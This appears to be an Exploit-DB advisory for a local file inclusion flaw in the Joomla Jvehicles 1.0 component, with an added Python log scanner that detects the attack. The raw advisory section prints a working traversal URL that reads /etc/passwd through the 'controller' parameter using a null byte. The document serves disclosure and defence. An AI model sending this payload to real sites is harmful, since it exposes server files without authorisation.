vendor: Jvehicles
by: Chip D3 Bi0s
CVSS: N/A
CWE: N/A (Local File Inclusion)
Product Name: Jvehicles
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2010

Joomla Component Jvehicles Local File Inclusion

The Jvehicles component for Joomla contains a local file inclusion vulnerability in its 'jvehicles.php' file. By manipulating the 'controller' parameter in the URL, an attacker can traverse the file system and make the server include local files, exposing sensitive files such as '/etc/passwd'.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of the Jvehicles component or to remove the vulnerable component from the Joomla installation.
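
An added example, not part of the original advisory or the Jvehicles code: it scans access-log lines for `option=com_jvehicles` requests whose `controller` value contains traversal sequences, a null byte, or anything other than a plain identifier. The log lines, the `vehicles` controller name and the identifier-only rule are assumptions made for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumption: legitimate controller names are plain identifiers.
SAFE_CONTROLLER = re.compile(r"[A-Za-z0-9_]+")
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines in combined log format (documentation IP ranges).
SAMPLE_LOG = [
    '198.51.100.7 - - [31/Mar/2010:10:00:00 +0000] "GET /index.php?option=com_jvehicles'
    '&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1532',
    '203.0.113.9 - - [31/Mar/2010:10:00:05 +0000] "GET /index.php?option=com_jvehicles'
    '&controller=vehicles&task=list HTTP/1.1" 200 9120',
    '203.0.113.9 - - [31/Mar/2010:10:00:09 +0000] "GET /index.php?option=com_content'
    '&view=article&id=3 HTTP/1.1" 200 4410',
]


def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so nested encoding cannot hide the value."""
    for _ in range(rounds):
        value = unquote(value)
    return value


def check_request(target):
    """Return sorted findings for one request target; empty list if clean."""
    params = parse_qs(urlsplit(target).query)
    if "com_jvehicles" not in params.get("option", []):
        return []
    findings = set()
    for raw in params.get("controller", []):
        value = fully_decode(raw)
        if "\x00" in value:
            findings.add("null-byte")
        if ".." in value or "/" in value or "\\" in value:
            findings.add("path-traversal")
        if not SAFE_CONTROLLER.fullmatch(value):
            findings.add("not-an-identifier")
    return sorted(findings)


def scan_log(lines):
    """Return (client, findings) for each line with a suspicious controller."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if m and (found := check_request(m.group(2))):
            hits.append((m.group(1), found))
    return hits
```

The same identifier-only check can be enforced at a reverse proxy or WAF in front of the site while the component remains installed.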

Exploit-DB raw data:

---------------------------------------------------------------------------------
Joomla Component Jvehicles Local File Inclusion
---------------------------------------------------------------------------------

Author		: Chip D3 Bi0s
Group		: LatinHackTeam
Email & msn	: chipdebios@gmail.com
Date		: 31 March 2010
Critical Lvl	: Moderate
Impact		: Exposure of sensitive information
Where		: From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~


Application	: Jvehicles
version		: 1.0
Developer	: este8an
License		: GPL            type  : Non-Commercial
Date Added	: 5 May 2009
Download	: http://www.jvehicles.com/index.php?option=com_remository&Itemid=6&func=select&id=2&orderby=3&lang=en




Description     :

Derivation of a popular component, com_properties (for Estate Agent).
This component is to manage vehicles, with the same functionality.


--------------
file error	: components/com_jvehicles/jvehicles.php

how to exploit

http://127.0.0.1/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00

------------------------


+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++